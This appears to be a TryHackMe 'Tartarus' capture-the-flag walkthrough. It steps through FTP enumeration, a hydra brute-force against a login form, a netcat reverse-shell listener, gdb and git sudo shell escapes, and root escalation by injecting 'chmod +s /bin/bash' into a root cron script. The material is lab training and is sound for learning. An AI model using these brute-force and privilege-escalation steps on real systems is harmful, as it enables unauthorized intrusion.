Tartarus- Tryhackme

Enumeration:

  • sC is used for script enumeration i.e which scripts are used
  • sV is used for service enumeration which services are running
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 14:40 IST
Nmap scan report for 10.10.148.67
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.82.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 98:6c:7f:49:db:54:cb:36:6d:d5:ff:75:42:4c:a7:e0 (RSA)
| 256 0c:7b:1a:9c:ed:4b:29:f5:3e:be:1c:9a:e4:4c:07:2c (ECDSA)
|_ 256 50:09:9f:c0:67:3e:89:93:b0:c9:85:f1:93:89:50:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
└─$ gobuster dir -u http://10.10.148.67/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,css 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.148.67/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt,css
[+] Timeout: 10s
===============================================================
2020/09/23 15:28:46 Starting gobuster
===============================================================
/index.html (Status: 200)
/robots.txt (Status: 200)

FTP Enumeration:

─$ ftp 10.10.148.67                                                                                                                                              2 ⚙
Connected to 10.10.148.67.
220 (vsFTPd 3.0.3)
Name (10.10.148.67:metaciphar): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ...
-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
226 Directory send OK.
ftp>
ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (17 bytes).
226 Transfer complete.
17 bytes received in 0.00 secs (123.8923 kB/s)
ftp>
ftp> cd ...
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
-rw-r--r-- 1 ftp ftp 14 Jul 05 21:45 yougotgoodeyes.txt
226 Directory send OK.
ftp>
└─$ cat yougotgoodeyes.txt                                                  
/sUp3r-s3cr3t
hydra -L userid -P credentials.txt 10.10.148.67 http-post-form /sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect username!
user - enox
pass - P@ssword1234
gobuster dir -u http://10.10.148.67/sUp3r-s3cr3t/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,css 2>/dev/null      5 ⚙
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.148.67/sUp3r-s3cr3t/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt,css
[+] Timeout: 10s
===============================================================
2020/09/23 16:24:13 Starting gobuster
===============================================================
/home.php (Status: 302)
/images (Status: 301)
/index.html (Status: 200)
/style.css (Status: 200)
└─$ nc -nlvp 1235                                                                                                                                           148 ⨯ 6 ⚙
listening on [any] 1235 ...
connect to [10.8.82.50] from (UNKNOWN) [10.10.148.67] 49312
Linux ubuntu-xenial 4.4.0-184-generic #214-Ubuntu SMP Thu Jun 4 10:14:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
10:57:04 up 2:02, 0 users, load average: 0.02, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

USER Enumeration:

Privilege Escalation:

sudo -l
Matching Defaults entries for www-data on ubuntu-xenial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-xenial:
(thirtytwo) NOPASSWD: /var/www/gdb
sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit
python -c 'import pty; pty.spawn("/bin/sh")'
$ sudo -l
sudo -l
Matching Defaults entries for thirtytwo on ubuntu-xenial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User thirtytwo may run the following commands on ubuntu-xenial:
(d4rckh) NOPASSWD: /usr/bin/git
sudo -u d4rckh git -p help config
!/bin/bash
$ sudo -u d4rckh git -p help config
sudo -u d4rckh git -p help config
WARNING: terminal is not fully functional
- (press RETURN)
GIT-CONFIG(1) Git Manual GIT-CONFIG(1)
NAME
git-config - Get and set repository or global options
SYNOPSIS
git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
git config [<file-option>] [type] --add name value
git config [<file-option>] [type] --replace-all name value [value_regex]
git config [<file-option>] [type] [-z|--null] --get name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-all name [value_regex
]
git config [<file-option>] [type] [-z|--null] [--name-only] --get-regexp
name_regex [value_regex]
git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
git config [<file-option>] --unset name [value_regex]
git config [<file-option>] --unset-all name [value_regex]
git config [<file-option>] --rename-section old_name new_name
git config [<file-option>] --remove-section name
git config [<file-option>] [-z|--null] [--name-only] -l | --list
git config [<file-option>] --get-color name [default]
git config [<file-option>] --get-colorbool name [stdout-is-tty]
git config [<file-option>] -e | --edit
:!/bin/bash
!/bin/bash
d4rckh@ubuntu-xenial:/home/d4rckh$
cat cleanup.py
# -*- coding: utf-8 -*-
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /home/cleanup/* ')
except:
sys.exit()
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/2 * * * * root python /home/d4rckh/cleanup.py
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
echo "os.system('chmod +s /bin/bash')" >>cleanup.py
d4rckh@ubuntu-xenial:/home/d4rckh$ cd /bin
cd /bin
d4rckh@ubuntu-xenial:/bin$ /bin/bash -p
/bin/bash -p
bash-4.3#
bash-4.3# cd /root
cd /root
bash-4.3# cat root.txt
cat root.txt
7e055812184axxxxxxxxxxxxx
bash-4.3#

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store